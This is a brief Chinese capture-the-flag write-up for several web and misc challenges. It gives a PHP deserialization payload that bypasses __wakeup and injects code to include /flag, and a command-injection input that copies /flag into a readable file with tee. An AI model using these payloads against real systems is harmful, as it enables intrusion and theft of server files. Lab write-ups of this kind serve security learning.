WEB - 签到了!!!你会玩2048么?
main.js
WEB - easy_unser
__wakeup可以把序列化后的属性个数改一下就可以绕过了。
?catf1ag=O:7:"catf1ag":2:{s:6:"target";s:26:"<?php include('/flag'); ?>";}
MISC - 签签
base64解码一下就可以了
WEB - 你猜猜是什么注入?
经测试cat,/,|,tee
可以用,虽然页面不能回显,但是我们可以把结果保存到文件中。
?catf1ag=cat /flag | tee 1.txt
#把flag内容保存到1.txt中
当然这题应该也可以外带,但我没有试成功。